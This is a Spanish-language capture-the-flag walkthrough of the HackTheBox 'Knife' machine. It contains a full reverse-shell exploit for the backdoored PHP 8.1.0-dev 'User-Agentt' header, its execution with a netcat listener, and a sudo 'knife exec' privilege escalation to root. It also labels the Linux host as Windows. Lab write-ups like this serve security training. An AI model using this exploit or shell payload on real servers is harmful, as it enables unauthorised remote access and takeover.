Knife

Sobre esta maquina: HTB

Sistema Operativo: Windows

Skills Usados:

PHP 8.1.0-DEV RCE
Abusing Sudoers

Metodologia:

Realizamos el primer escaneo de reconocimiento:

// 
❯ nmap -p- --open -sS -T4 -n -Pn 10.10.10.242 -oN First_Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:29 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.95% done; ETC: 19:30 (0:00:03 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Ahora hacemos un escaneo con Scripts y versiones en los puertos abiertos:

// 
❯ nmap -p80,22 -sVC -sS -T4 -n -Pn 10.10.10.242 -oN sVC_Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:32 EDT
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e

22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Revisamos que corre por el puerto 80:

Vemos que es un servidor apache que usa codigo PHP 8.1.0-dev.

Enumeramos subdominos con Gobuster pero no conseguimos nada:

// 
❯ gobuster dir -u "http://10.10.10.242/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.10.10.242/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode

Buscamos exploits para PHP 8.1.0-DEV Y conseguimos uno en particular, revisando el perfil de desarrollador, encontramos en su github un archivo python que permite obtener una revshell directamente asi que tambien lo descargamos:

// 
❯ searchsploit 8.1.0-dev

Exploit Title | Path

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py

Movemos el exploit para ejectuarlo:

// 
❯ mv revshell_php_8.1.0-dev.py /home/guerrerove/HTB/machines/knife/exploit

En lo que consiste el exploit:

// 
Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
Date: 23 may 2021
Exploit Author: flast101
Vendor Homepage: https://www.php.net/
Software Link:
- https://hub.docker.com/r/phpdaily/php
- https://github.com/phpdaily/php
Version: 8.1.0-dev
Tested on: Ubuntu 20.04
CVE : N/A
References:
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
- https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
Usage:
python3 revshell_php_8.1.0-dev.py 
"""
#!/usr/bin/env python3
import os, sys, argparse, requests
request = requests.Session()
def check_target(args):
response = request.get(args.url)
for header in response.headers.items():
if "PHP/8.1.0-dev" in header[1]:
return True
return False
def reverse_shell(args):
payload = 'bash -c "bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1"'
injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)
def main():
parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp ")
parser.add_argument("url", metavar='', help="Target URL")
parser.add_argument("lhost", metavar='', help="Attacker listening IP",)
parser.add_argument("lport", metavar='', help="Attacker listening port")
args = parser.parse_args()
if check_target(args):
reverse_shell(args)
else:
print("Host is not available or vulnerable, aborting...")
exit
if name == "main":
main()

Ejecutamos el Script y nos ponemos en escucha:

// 
❯ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.51 443

❯ nc -nlvp 443

listening on [any] 443 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.242] 42898
bash: cannot set terminal process group (989): Inappropriate ioctl for device
bash: no job control in this shell

james@knife:/$

Obtuvimos la reverse Shell, estamos dentro, ahora conseguimos la primera flag:

// 
james@knife:/$ cd /home

james@knife:/home$ cd james

james@knife:~$ cat user.txt

bfdda457427a526151f71c62184a9321

Intentaremos escalar privilegios primero listando el id y los permisos como administrador:

// 
james@knife:~$ id

uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User james may run the following commands on knife:

(root) NOPASSWD: /usr/bin/knife

Vemos que pudemos ejecutar el comando /usr/bin/knife , Este binario es vulnerable a la injeccion de una consola interactiva a traves de one liner "sudo knife exec -E 'exec "/bin/sh"', asi que lo ejecutaremos:

// 
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'

whoami

root

Hemos ganado acceso, ahora ubicaremos la ultima flag:

// 
cd /root

ls

delete.sh root.txt snap

cat root.txt

ed84828a0b7baf1d3c7a901152f08c47

Conseguimos la ultima flag y damos por finalizada esta maquina.

PreviousLegacy NextKeeper

Last updated 7 months ago